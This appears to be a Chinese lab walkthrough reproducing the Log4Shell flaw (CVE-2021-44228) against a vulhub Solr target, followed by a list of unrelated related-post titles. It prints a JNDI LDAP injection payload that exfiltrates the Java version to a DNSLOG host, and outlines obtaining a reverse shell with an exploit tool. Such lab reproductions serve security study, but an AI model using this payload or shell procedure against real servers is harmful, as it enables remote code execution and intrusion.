vulhub log4j2 CVE-2021-44228漏洞复现

1.开启环境

2.访问靶场

3.可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!

可以访问到我们Java的版本,所以说明此处存在命令执行漏洞

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ir3n8l.dnslog.cn}

4.开始反弹shell

但是此处需要JNDI-Injection-Exploit

JNDI项目地址:

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

5.准备payload,并进行base64加密

6.将此payload复制到模版中,变为最终payload

在kali进行最终payload的运行,会获得一串有jndi生成的payload

7.监听6666端口

然后使用这条命令在log4j2中运行

8.最终会在监听处反弹回shell

相关推荐
zfj3212 天前
java日志框架:slf4j、jul(java.util.logging)、 log4j、 logback
java·log4j·logback·java日志框架·slf4j·jul
星蓝_starblue2 天前
单元测试(C++)——gmock通用测试模版(个人总结)
c++·单元测试·log4j
从零开始的-CodeNinja之路4 天前
【自动化】深度解析仓库存储UI自动化
ui·自动化·log4j
luo_guibin12 天前
vulhub复现CVE-2021-44228log4j漏洞
java·log4j·cve-2021-44228
ahauedu13 天前
SpringBoot中读取mock数据-高效调试接口
spring boot·后端·log4j
黄金右肾14 天前
Qt之第三方库‌日志log使用(四)
c++·qt·ui·log4j·qslog
oscar99920 天前
三步入门Log4J 的使用
单元测试·log4j
st_3320 天前
Junit5 单元测试入门
数据库·单元测试·log4j
java使徒23 天前
kafka消息在client是怎么写入的
java·jvm·spring boot·spring cloud·kafka·tomcat·log4j
武昌库里写JAVA1 个月前
SpringCloud+SpringCloudAlibaba学习笔记
java·开发语言·算法·spring·log4j